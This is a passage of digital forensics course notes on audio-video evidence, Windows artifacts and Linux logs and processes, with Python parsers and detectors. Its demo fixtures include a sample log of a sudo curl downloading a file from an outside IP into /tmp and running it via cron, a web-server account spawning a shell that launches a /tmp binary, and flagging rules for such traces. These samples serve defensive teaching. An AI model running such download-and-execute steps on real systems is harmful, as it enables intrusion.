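    eer_t = equal_error_threshold(GENUINE, IMPOSTOR)
    print(f"equal error threshold {eer_t:.2f}")
    print("FRR at 0.7 after wear:", frr(worn_fingers(GENUINE, 0.1), 0.7),
          "vs before:", frr(GENUINE, 0.7))
```

With only ten samples per class the rates move in steps of 0.1, which is why the example speaks of a trade-off rather than a precise number; a real evaluation uses thousands of attempts, but the shape of the curve is the same.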

Audio-Video Analysis
Audio and video recordings are digital sources of evidence that can be found at the scene of a crime,
or with the victim or the accused, in the form of recordings from a mobile device or CCTV footage.
Such digital evidence is of utmost importance in civil and criminal cases. Therefore, audio and video
forensics is the leading branch of forensic science in the digital era.
In forensic science, audio-video forensics rests on three basic activities: the acquisition, analysis,
and evaluation of audio and video recordings that are admissible in a court of law. One of the main
tasks of audio and video forensic experts is to establish the authenticity and credibility of digital
evidence. The forensic examination of audio and video is also done to enhance the recordings so as
to improve speech intelligibility and the audibility of sounds.
How is the analysis of audio-video evidence performed?
One of the primary tasks of forensic digital investigators is to assist the crime scene investigators in
finding conclusive proof using a range of scientific tools and equipment. Following the standardized
procedure of crime scene investigation, at the time of evidence collection the investigators must
thoroughly search the suspected area and recover the evidence carefully. Such digital evidence must be
protected from physical harm, the environment, and heat.
Once the evidence has been collected in a safe and secure manner, it must be properly documented in
the form of notes or photography/videography. The documentation must include the condition in which
the evidence was found at the crime scene, along with the name of the evidence collector and the date
and time of collection. Examination protocols are then carefully drawn up, specifying the enhancement
techniques to be applied to the recovered evidence.
A variety of enhancement techniques can be employed in audio and video analysis. The
techniques employed for video enhancement are as follows:
a. Sharpening: This step makes the edges of the images clearer and more distinct.
b. Video Stabilization: This step reduces the amount of camera movement in the video and
produces smoother playback.
c. Masking: This step covers faces or areas of the video in order to protect the victim, a witness,
or a law enforcement official.
d. Interlacing: In an analog system, interlaced scanning is used to record the images; the reverse
process, de-interlacing, may be used to retrieve the information from such recordings.
e. Demultiplexing: A CCTV device called a multiplexer combines multiple video signals into a
single signal; demultiplexing separates the combined signal back into the individual signals.
The techniques employed for audio enhancement are as follows:
a. Frequency Equalization: precise equalizers are used to cut or boost specific frequency bands. The
band that carries most of the speech content is amplified or isolated, while persistent noise or
interference, identified with a spectrum analyzer, is attenuated at its frequencies to lower the
noise level.
b. Compression: dynamic range compression (leveling) reduces the difference between the loudest
and quietest parts of the signal, so that faint speech becomes audible without the loud passages clipping.
Such evidence is analyzed critically and listened to carefully, and every step must be properly
documented. After the standard forensic protocol has been followed, the forensic report is prepared by
a forensic cyber expert and presented in the court of law.
The forensic audio-video report must include the following details:
1. Results obtained from the analysis of the audio-video files
2. Waveform charts of the audio recordings and, for voice comparison, spectrograms showing formants
3. Identification of the format and type of recording
4. Type of processing used in the analysis
5. Date and time of the analysis
6. Description of the evidence and the circumstances and conditions in which it was
collected
7. Description of the enhanced audio-video and the software that was used
8. Qualifications of the audio-video analyst
9. Authorized signatory with name and stamp
10. Hash values of the original and the enhanced audio-video files
Software for Audio Analysis
 WavePad Master
 Sonic Visualiser
 Praat
 GoldWave
 Audacity
 Speech Analyzer

Windows System Forensics

When doing Windows forensic analysis, the sheer volume of data that has to be collected can be
overwhelming even when you know what you are looking for. If you do not know what you are looking
for, the process becomes twice as hard, so it pays to know the standard artifact locations in advance.
What is Windows Forensic Analysis?
Windows Forensic Analysis focuses on 2 things:
1. In-depth analysis of Windows Operating System.
2. Analysis of Windows System Artifacts.
Windows artifacts are the objects which hold information about the activities that are performed
by the Windows user. The type of information and the location of the artifact varies from one
operating system to another. Windows artifacts contain sensitive information that is collected and
analyzed at the time of forensic analysis.
What are Forensic Artifacts?
Forensic artifacts are objects on a system that have evidential value: anything that records that
something happened, such as log files, registry hives, shortcut files, caches, and many more.
In this section, we go through some of the forensic artifacts that a forensic investigator
looks for while performing a forensic analysis of Windows.
1. Recycle Bin: The Windows Recycle Bin contains some useful artifacts:
 A $I file holding the metadata of each deleted file (original path, original size, and deletion
timestamp). It is found under C:\$Recycle.Bin\<SID>\$Ixxxxxx, where <SID> is the security
identifier of the user who deleted the file.
 A matching $R file holding the contents of the deleted file, located under
C:\$Recycle.Bin\<SID>\$Rxxxxxx.
 $I files can be parsed with a tool such as $I Parse.
2. Browsers: Web browsers contain a lot of information like:
 Cookies.
<="" li="" style="box-sizing: border-box;">
 Cached website data.
 Downloaded files.
3. Windows Error Reporting: This feature lets users report application faults, kernel faults,
unresponsive applications, and other application-specific problems to Microsoft. It provides
artifacts such as:
 Evidence of program execution, when a malicious program crashes (the report records the
faulting executable's path and the time of the crash).
These artifacts can be found at the following locations:
 C:\ProgramData\Microsoft\Windows\WER\ReportArchive
 C:\Users\XXX\AppData\Local\Microsoft\Windows\WER\ReportArchive
 C:\ProgramData\Microsoft\Windows\WER\ReportQueue
 C:\Users\XXX\AppData\Local\Microsoft\Windows\WER\ReportQueue
4. Remote Desktop Protocol Cache: The mstsc client that ships with Windows caches sections of the
remote screen that change rarely, so that they need not be retransmitted. Because attackers
frequently use RDP to move laterally through a network, these bitmap cache files can reveal what
the user saw on the machine they were connected to. They are located in the directory:
C:\Users\XXX\AppData\Local\Microsoft\Terminal Server Client\Cache
Tools like BMC-Tools can be used to reassemble the images stored in these cache files.
5. LNK Files: .lnk files are Windows shortcut files. They link or point to other files or
executables for ease of access, and Windows creates them automatically when a user opens a file
through Explorer. You can find the following information in these files:
 The original path of the target file.
 Timestamps of both the target file (stored inside the .lnk) and the .lnk file itself (from the file system).
 File attributes of the target, such as System, Hidden, etc.
 Details about the volume the target was on (serial number, label, drive type).
 Whether the target was on a local or a remote (network) path.
 The MAC address of the machine on which the shortcut was created (from the tracker data block).
You can use tools like the Windows LNK Parsing Library or LECmd to parse the contents of these
files.
6. Jump Lists: They contain information about the recently accessed applications and files. This
feature was introduced with Windows 7. Two types of Jump Lists can be created in Windows:
 AUTOMATICDESTINATIONS-MS: These jump lists are created automatically when
a user opens a file or an application. They are located under the path:
C:\Users\xxx\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations
 CUSTOMDESTINATIONS-MS: These jump lists are custom made and are created
when a user pins a file or an application. They are located under the
directory C:\Users\xxx\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations
You can use tools like JumpList Explorer, JLECmd, or Windows JumpList Parser to parse
Jump lists.
7. Prefetch Files: These files contain a wealth of information, such as:
 Application name.
 Application path, and the files and directories the application touched during its first seconds of execution.
 Last execution timestamp (Windows 8 and later store the last eight run times).
 Creation timestamp of the prefetch file, which approximates the first execution.
 Run count.
These files are located under the directory C:\Windows\Prefetch\. You can use tools
like the Windows Prefetch Parser, WinPrefetchView, or PECmd.
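The two parsers below are an added example, not code from the original notes or from any of the tools named above. They decode a Recycle Bin $I record (item 1) in both its Vista-era and Windows 10 layouts, and the fixed 76-byte ShellLinkHeader at the start of every .lnk file (item 5), which is where the target's timestamps, size and attributes are stored. The sample records are constructed in memory rather than read from C:\$Recycle.Bin or a Recent folder, so the script runs anywhere.

```python
"""Parse two Windows artifacts: a Recycle Bin $I record and the 76-byte
ShellLinkHeader of a .lnk file.  Sample inputs are constructed in memory
(not taken from a real system) so the script runs offline."""
import struct
from datetime import datetime, timedelta, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME = 100-ns ticks since 1601-01-01 UTC."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse of filetime_to_datetime; integer arithmetic keeps it exact."""
    td = dt - EPOCH_1601
    return (td.days * 86400 + td.seconds) * 10_000_000 + td.microseconds * 10


def parse_recycle_bin_i_file(data: bytes) -> dict:
    """$I record: 8-byte version, 8-byte original size, 8-byte deletion FILETIME,
    then the original path.  Version 1 (Vista to 8.1) stores a fixed 260-char
    UTF-16LE path; version 2 (Windows 10 and later) stores a 4-byte character
    count (including the NUL) followed by a variable-length UTF-16LE path."""
    if len(data) < 24:
        raise ValueError("truncated $I record")
    version, size, deleted_ft = struct.unpack_from("<QQQ", data, 0)
    if version == 1:
        raw = data[24:24 + 520]
    elif version == 2:
        (nchars,) = struct.unpack_from("<I", data, 24)
        raw = data[28:28 + nchars * 2]
    else:
        raise ValueError(f"unknown $I version {version}")
    path = raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0]
    return {"version": version, "original_size": size,
            "deleted_at": filetime_to_datetime(deleted_ft), "original_path": path}


LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
ATTRIBUTE_NAMES = {0x01: "READONLY", 0x02: "HIDDEN", 0x04: "SYSTEM",
                   0x10: "DIRECTORY", 0x20: "ARCHIVE"}
LINK_FLAG_NAMES = {0x01: "HasLinkTargetIDList", 0x02: "HasLinkInfo", 0x04: "HasName",
                   0x08: "HasRelativePath", 0x10: "HasWorkingDir",
                   0x20: "HasArguments", 0x40: "HasIconLocation", 0x80: "IsUnicode"}


def parse_lnk_header(data: bytes) -> dict:
    """ShellLinkHeader (MS-SHLLINK 2.1): HeaderSize 0x4C, LinkCLSID, LinkFlags,
    FileAttributes, creation/access/write FILETIMEs of the *target*, target
    FileSize, IconIndex, ShowCommand, HotKey, 10 reserved bytes.  The .lnk
    file's own timestamps come from the file system, not from this header."""
    if len(data) < 0x4C:
        raise ValueError("truncated .lnk header")
    (hdr_size,) = struct.unpack_from("<I", data, 0)
    if hdr_size != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (flags, attrs, ctime, atime, wtime,
     fsize, _icon, _show, _hotkey) = struct.unpack_from("<IIQQQIIIH", data, 20)
    return {
        "link_flags": [n for bit, n in LINK_FLAG_NAMES.items() if flags & bit],
        "target_attributes": [n for bit, n in ATTRIBUTE_NAMES.items() if attrs & bit],
        "target_created": filetime_to_datetime(ctime),
        "target_accessed": filetime_to_datetime(atime),
        "target_modified": filetime_to_datetime(wtime),
        "target_size": fsize,
    }


def build_sample_i_file(path: str, size: int, deleted: datetime, version: int = 2) -> bytes:
    """Constructed $I record for the demo (not a real Recycle Bin file)."""
    encoded = (path + "\x00").encode("utf-16-le")
    head = struct.pack("<QQQ", version, size, datetime_to_filetime(deleted))
    if version == 1:
        return head + encoded.ljust(520, b"\x00")
    return head + struct.pack("<I", len(path) + 1) + encoded


def build_sample_lnk(target_time: datetime, size: int, attrs: int, flags: int) -> bytes:
    """Constructed 76-byte ShellLinkHeader for the demo (no trailing structures)."""
    ft = datetime_to_filetime(target_time)
    return struct.pack("<I16sIIQQQIIIH10s", 0x4C, LNK_CLSID, flags, attrs,
                       ft, ft, ft, size, 0, 1, 0, b"\x00" * 10)


def demo() -> dict:
    """Parse one constructed record of each kind and return the results."""
    deleted = datetime(2023, 5, 4, 12, 30, tzinfo=timezone.utc)
    target_mtime = datetime(2023, 4, 30, 8, 0, 5, tzinfo=timezone.utc)
    return {
        "i_v2": parse_recycle_bin_i_file(
            build_sample_i_file(r"C:\Users\alice\Documents\plan.docx", 4096, deleted)),
        "i_v1": parse_recycle_bin_i_file(
            build_sample_i_file(r"C:\Temp\old.log", 1200, deleted, version=1)),
        "lnk": parse_lnk_header(build_sample_lnk(target_mtime, 73216, 0x22, 0x83)),
    }


if __name__ == "__main__":
    for name, rec in demo().items():
        print(name, rec)
```

On a real image, read each $I file under C:\$Recycle.Bin\<SID>\ and each .lnk under the user's Recent folder into `data` and call the parser; pair the $I metadata with the $R file of the same suffix to recover the content. Hash the originals before parsing so the report can show they were not altered.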
Top Free and Open-Source Tools for Windows Forensic Analysis
In this section, we discuss some of the free or open-source tools that are available for
conducting forensic analysis on the Windows operating system.
1. Magnet Encrypted Disk Detector: Checks the physical drives of a live system for encrypted
volumes, so that the examiner knows to capture them before powering the machine off. It detects
PGP, SafeBoot and BitLocker encrypted volumes, among others.
2. Magnet RAM Capture: Captures the physical memory of a live system for later analysis.
3. Wireshark: A network protocol analyzer and capture tool used to see what traffic is
flowing on your network.
4. RAM Capture: As the name suggests, a free tool used to extract the entire contents of
volatile memory, i.e. RAM.
5. NMAP: The most widely used network scanner. It discovers hosts and identifies the open ports
and the services behind them on a target machine.
6. NetworkMiner: A passive network sniffer that extracts operating systems, ports, sessions,
hostnames, transferred files and credentials from captured traffic.
7. Autopsy: A GUI-based tool used to analyze disk images and smartphone extractions.
8. Forensic Investigator: A Splunk app that offers hex conversion, Base64 conversion, Metascan
lookups and many other features that are useful in forensic analysis.
9. HashMyFiles: Calculates MD5 and SHA1 hashes of files (current versions also offer SHA-256 and
others). It runs on all recent versions of Windows.
10. CrowdResponse: Gathers system information for incident response.
11. ExifTool: Reads, writes and edits metadata in a wide range of file types.
12. FAW (Forensic Acquisition of Websites): Acquires web pages (images, HTML, source code) in a
forensically sound manner and can be integrated with Wireshark.
There is a large variety of forensic tools available. Some are free and open-source and some
charge annual or monthly fees. Identify your requirements and choose the tool that best suits them.

Linux Forensics
Linux forensics refers to performing forensic investigation on a Linux operated device. To do
so, the investigators should have a good understanding on the techniques required to conduct live
analysis; to collect volatile and non-volatile data, along with knowledge of various shell
commands and the information they can retrieve. The investigators should also be aware of the
Linux log files, their storage and location in the directory, as they are the most important sources
of information to trace down the attacker. This module will walk you through the various shell
commands, methods to collect volatile data, the different log files and the information they
provide.
Shell Commands
Investigators use Linux shell commands to collect information from the system. Some of the
frequently used commands include:
1. dmesg
The command dmesg (short for "display message" or "driver message") prints the kernel ring buffer,
which holds messages about the drivers loaded into the kernel during the boot process, errors
raised while loading them, and later kernel events such as USB devices being attached. These
messages are helpful in diagnosing and resolving device driver issues, and in establishing what
hardware was connected to the machine.
Syntax: dmesg [options]
dmesg | grep -i eth0 (Displays kernel messages about the Ethernet interface eth0)
2. fsck
The command fsck (File System Consistency Check) checks the consistency of a Linux file system
and can repair it. Because repairs modify the file system, run it only on a working copy of the
evidence, never on the original.
Syntax: fsck -A (Checks all file systems listed in /etc/fstab)
3. stat
Displays file or file system status, including size, owner, permissions, inode number and the
access, modification and change timestamps.
Syntax: stat [OPTION]... FILE...
4. history
The command history lists the commands previously entered in the Bash shell. It helps
investigators audit what a user typed.
Syntax: history n (Lists the last n commands)
5. mount
The command mount attaches a file system or a device to the directory tree, making it accessible
to the system. Evidence images should be mounted read-only (mount -o ro ...) so that nothing on them changes.
Syntax: mount -t type device dir (Requests that the kernel attach the file system of type type
found on device at the directory dir)
Linux Log Files
Log files are records of all the activities performed over an operating system. Linux log files
store information about the system’s kernel and the services running in the system. In Linux OS,
different log files hold different information, which helps the investigators to analyze various
issues during a security incident.
Investigators should learn and understand about the contents of various log files, which will help
them during security incidents and help them understand the locations they might have to look
for finding potential evidences.
Below are some Linux log file locations that can help investigators find the required data:
/var/log/messages: Global system messages
/var/log/dmesg: Kernel ring buffer information
/var/log/cron: Information about cron jobs
/var/log/user.log: All user-level logs
/var/log/lastlog: Recent login information for each user (a binary file; read it with the lastlog command)
/var/log/boot.log: Information logged during system boot
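As an added example (not part of the original notes), the script below merges classic syslog-format lines of the kind found in /var/log/messages and /var/log/cron into a single ordered timeline, and flags cron activity worth a second look. The log lines are constructed for the demo, and the year is an assumption supplied by the caller, because the classic syslog line format does not record one.

```python
"""Build one time-ordered timeline from classic syslog-format lines
(/var/log/messages, /var/log/cron) and flag cron activity of interest.
The log excerpts below are constructed for the demo, not copied from a host."""
import re
from datetime import datetime

MESSAGES_LOG = """\
Mar 12 09:14:02 webhost kernel: [ 1234.567890] usb 1-1: new high-speed USB device number 4 using xhci_hcd
Mar 12 09:15:47 webhost sshd[2210]: Accepted password for deploy from 203.0.113.7 port 51022 ssh2
Mar 12 09:16:03 webhost sudo:   deploy : TTY=pts/1 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/curl -o /tmp/x http://198.51.100.9/x
"""
# Deliberately out of order: a single file is not always chronological.
CRON_LOG = """\
Mar 12 09:20:01 webhost CROND[2290]: (root) CMD (/tmp/x)
Mar 12 09:17:30 webhost crontab[2255]: (root) REPLACE (root)
"""

# "Mon DD HH:MM:SS host proc[pid]: message" (RFC 3164 style, no year)
SYSLOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) "
    r"(?P<host>\S+) (?P<proc>[^:\[\s]+)(?:\[(?P<pid>\d+)\])?:\s*(?P<msg>.*)$")
MONTHS = {m: i for i, m in enumerate(
    "Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), 1)}


def parse_syslog(text: str, source: str, year: int) -> list:
    """Parse one log file's text into event dicts; unparsed lines are skipped."""
    events = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = SYSLOG_RE.match(line)
        if not m or m["mon"] not in MONTHS:
            continue
        hh, mm, ss = (int(x) for x in m["time"].split(":"))
        stamp = datetime(year, MONTHS[m["mon"]], int(m["day"]), hh, mm, ss)
        events.append({"time": stamp, "source": source, "line": lineno,
                       "host": m["host"], "proc": m["proc"],
                       "pid": int(m["pid"]) if m["pid"] else None, "msg": m["msg"]})
    return events


def build_timeline(year: int = 2024) -> list:
    """Merge the per-file event lists and sort by time, then source, then line."""
    events = (parse_syslog(MESSAGES_LOG, "/var/log/messages", year)
              + parse_syslog(CRON_LOG, "/var/log/cron", year))
    return sorted(events, key=lambda e: (e["time"], e["source"], e["line"]))


# Assumed heuristics for the demo: cron edits, and jobs run from world-writable dirs.
SUSPECT_PATHS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def flag_cron_events(events: list) -> list:
    flagged = []
    for e in events:
        if e["proc"] == "crontab" and " REPLACE " in e["msg"]:
            flagged.append((e, "crontab replaced"))
        elif e["proc"] in ("CROND", "cron") and any(p in e["msg"] for p in SUSPECT_PATHS):
            flagged.append((e, "cron job runs from a world-writable directory"))
    return flagged


if __name__ == "__main__":
    timeline = build_timeline(2024)
    for e in timeline:
        print(e["time"].isoformat(), e["source"], e["proc"], e["msg"])
    for e, reason in flag_cron_events(timeline):
        print("FLAG", e["time"].isoformat(), reason, "|", e["msg"])
```

Sorting across files is what turns the separate logs into a story: the SSH login, the sudo curl to /tmp/x, the crontab rewrite and the cron execution of /tmp/x line up in order even though the cron file itself was not chronological. On a real image, take the year from the log file's modification time and extend the parser with whatever other files the distribution writes.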
Collecting Volatile Data (cont’d)
1. .bash_history
The .bash_history file in each user's home directory stores the Bash command history. It helps
the investigator analyze the commands a malicious user ran in the terminal. It is normally written
when the shell exits and can be cleared or disabled by the user, so its absence is itself worth recording.
2. /proc
The /proc directory, also known as the proc file system, is a virtual file system whose special
files reflect the current state of the kernel. Investigators can find information about the system's
hardware and the running processes there (for example /proc/<pid>/cmdline, /proc/<pid>/exe and
/proc/<pid>/maps). The proc file system acts as an interface to the kernel's internal data structures.
3. ps
The command ps (short for "process status") lists the processes running on the system. It provides
a snapshot of the current processes with details such as user ID, CPU usage, memory usage and
command name. Investigators can inspect the process tree (ps -ef --forest, or pstree) to spot
suspicious processes and their parent-child relationships.
Investigators need detailed information and evidence to solve a case. The commands above provide
ample information about the volatile state of a Linux machine (running processes, /proc) as well
as about non-volatile data such as command history and configuration files. The investigator decides
which information to extract from configuration files, or which information about (or from) files to
collect for additional analysis, because in some cases the attacker may still be logged into the
system during the investigation. In such cases, the investigator may decide to track the attacker
rather than disconnect the machine immediately.
The investigator must also preserve important information from being modified or deleted. This
includes safeguarding the non-volatile information of the system, including firewall logs, swap
files, antivirus logs, slack space, and unallocated drive space. To preserve the integrity of the
evidence, a chain of custody is prepared and the collected evidence is hashed and documented for
further investigation.
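Added example (not from the original notes): reconstructing the process tree from ps output, as described under item 3 above, and flagging the two relationships an investigator usually checks first. The ps output, the list of web-server service accounts and the set of world-writable directories are assumptions made for the demo.

```python
"""Rebuild the process tree from `ps -eo pid,ppid,user,args` output and flag
a web-server service account spawning a shell and executables running from
world-writable directories.  The ps output below is constructed for the demo."""
from dataclasses import dataclass, field

PS_OUTPUT = """\
  PID  PPID USER     ARGS
    1     0 root     /sbin/init
  612     1 root     /usr/sbin/sshd -D
  890     1 root     /usr/sbin/cron -f
  901     1 www-data /usr/sbin/apache2 -k start
  915   901 www-data /usr/sbin/apache2 -k start
 2317   915 www-data sh -c /tmp/.x/agent
 2318  2317 www-data /tmp/.x/agent
 2400   612 root     sshd: deploy [priv]
 2410  2400 deploy   -bash
"""


@dataclass
class Proc:
    pid: int
    ppid: int
    user: str
    args: str
    children: list = field(default_factory=list)

    @property
    def comm(self) -> str:
        """Executable name without path or the leading '-' of a login shell."""
        return self.args.split()[0].rsplit("/", 1)[-1].lstrip("-")


def parse_ps(text: str) -> dict:
    """Map pid -> Proc and link each process to its parent's children list."""
    procs = {}
    for line in text.splitlines()[1:]:          # skip the header row
        pid, ppid, user, args = line.split(None, 3)
        procs[int(pid)] = Proc(int(pid), int(ppid), user, args)
    for p in procs.values():
        if p.ppid in procs:
            procs[p.ppid].children.append(p)
    return procs


def ancestry(procs: dict, pid: int) -> list:
    """PIDs from the given process up to the root (stops at an unknown parent)."""
    chain = []
    while pid in procs:
        chain.append(pid)
        pid = procs[pid].ppid
    return chain


def render_tree(procs: dict) -> list:
    """Indented lines, one per process, children under their parent."""
    lines = []

    def walk(p: Proc, depth: int) -> None:
        lines.append(f"{'  ' * depth}{p.pid} {p.user} {p.args}")
        for c in sorted(p.children, key=lambda c: c.pid):
            walk(c, depth + 1)

    for p in sorted(procs.values(), key=lambda p: p.pid):
        if p.ppid not in procs:                 # roots: init, orphans
            walk(p, 0)
    return lines


# Assumed for the demo; tune to the environment under investigation.
SERVICE_USERS = {"www-data", "apache", "nginx", "httpd"}
SHELLS = {"sh", "bash", "dash", "zsh"}
SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def flag_suspicious(procs: dict) -> list:
    flagged = []
    for p in sorted(procs.values(), key=lambda p: p.pid):
        if p.user in SERVICE_USERS and p.comm in SHELLS:
            flagged.append((p.pid, "shell spawned under a web-server service account"))
        if p.args.split()[0].startswith(SUSPECT_DIRS):
            flagged.append((p.pid, "executable runs from a world-writable directory"))
    return flagged


if __name__ == "__main__":
    procs = parse_ps(PS_OUTPUT)
    print("\n".join(render_tree(procs)))
    for pid, reason in flag_suspicious(procs):
        print(f"FLAG pid {pid}: {reason}; ancestry {ancestry(procs, pid)}")
```

On a live system, feed the function the real output of `ps -eo pid,ppid,user,args` (captured to evidence storage first), and corroborate anything flagged with /proc/<pid>/exe, which still points at the binary even if it was deleted after launch.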
4. Swap Space
The Linux operating system allocates a certain amount of storage on the hard disk, called swap
space, which it uses as an extension of the computer's real memory (RAM). The OS divides physical
RAM into chunks called pages. Swap space allows the operating system to behave as if more RAM were
available than is physically present: the least recently used pages in RAM can be "swapped out" to
disk until they are needed again, so that other pages can be "swapped in". In larger operating
systems (such as IBM's OS/390) the same mechanism is called paging.
One advantage of a dedicated swap partition is that it is a single contiguous region, so the system
needs fewer I/O operations to read or write it. In general, Windows and UNIX-based operating systems
provide a default swap space of a certain size that the user or a system administrator can change.
For the investigator, swap is valuable because pages of process memory written to it (which may
contain passwords, keys, or fragments of documents) survive a reboot, so the swap partition or file
should be imaged along with the rest of the disk.